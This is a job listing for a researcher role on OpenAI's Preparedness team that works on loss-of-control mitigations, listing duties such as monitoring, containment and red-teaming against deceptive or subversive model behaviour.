Researcher, Loss of Control
OpenAISan FranciscoPosted 10 March 2026
Job Description
Researcher, Loss of Control
ABOUT THE TEAM
The Safety Systems org ensures that OpenAI’s most capable models can be responsibly developed and deployed. We build evaluations, safeguards, and safety frameworks that help our models behave as intended in real-world settings.
The Preparedness team is an important part of the Safety Systems https://openai.com/safety/safety-systems org at OpenAI, and is guided by OpenAI’s Preparedness Framework https://openai.com/index/updating-our-preparedness-framework/.
Frontier AI models have the potential to benefit all of humanity, but also pose increasingly severe risks. To ensure that AI promotes positive change, the Preparedness team helps us prepare for the development of increasingly capable frontier AI models. This team is tasked with identifying, tracking, and preparing for catastrophic risks related to frontier AI models.
The mission of the Preparedness team is to:
1. Closely monitor and predict the evolving capabilities of frontier AI systems, with an eye towards risks whose impact could be catastrophic
2. Ensure we have concrete procedures, infrastructure and partnerships to mitigate these risks and to safely handle the development of powerful AI systems
Preparedness tightly connects capability assessment, evaluations, and internal red teaming, and mitigations for frontier models, as well as overall coordination on AGI preparedness. This is fast paced, exciting work that has far reaching importance for the company and for society.
ABOUT THE ROLE
As frontier AI systems become more capable, they are increasingly able to pursue long-horizon goals, use tools, adapt to feedback, and operate with greater autonomy. These advances create enormous potential benefits, but they also introduce the risk that models may behave in ways that are misaligned, deceptive, or difficult to supervise or contain. Reducing loss of control risk is therefore a core challenge for safely developing and deploying advanced AI systems.
As a Researcher for loss of control mitigations, you will help design and implement an end-to-end mitigation stack to reduce the risk of intentionally subversive or insufficiently controllable model behavior across OpenAI’s products and internal deployments. This role requires strong technical depth and close cross-functional collaboration to ensure safeguards are enforceable, scalable, and effective. You’ll contribute directly to building protections that remain robust as model capabilities, deployment patterns, and threat models evolve.
IN THIS ROLE, YOU WILL:
- Design and implement mitigation components for loss of control risk—spanning prevention, monitoring, detection, containment, and enforcement—under the guidance of senior technical and risk leadership.
- Integrate safeguards across product and research surfaces in partnership with product, engineering, and research teams, helping ensure protections are consistent, low-latency, and resilient as usage and model autonomy increase.
- Evaluate technical trade-offs within the loss of control domain (coverage, robustness, latency, model utility, and operational complexity) and propose pragmatic, testable solutions.
- Collaborate closely with risk modeling, evaluations, and policy partners to align mitigation design with anticipated failure modes and high-severity threat scenarios, including deceptive alignment, hidden subgoals, reward hacking, and attempts to evade oversight.
- Execute rigorous testing and red-teaming workflows, helping stress-test the mitigation stack against increasingly capable and potentially subversive model behaviors—such as sandbagging, monitor evasion, exploit-seeking, unsafe tool use, or strategic deception—and iterate based on findings.
YOU MIGHT THRIVE IN THIS ROLE IF YOU:
- Have a passion for AI safety and are motivated to make cutting-edge AI models safer for real-world use.
- Bring demonstrated experience in deep learning and transformer models.
- Are proficient with frameworks such ... (truncated, view full listing at source)
Apply Now
Direct link to company career page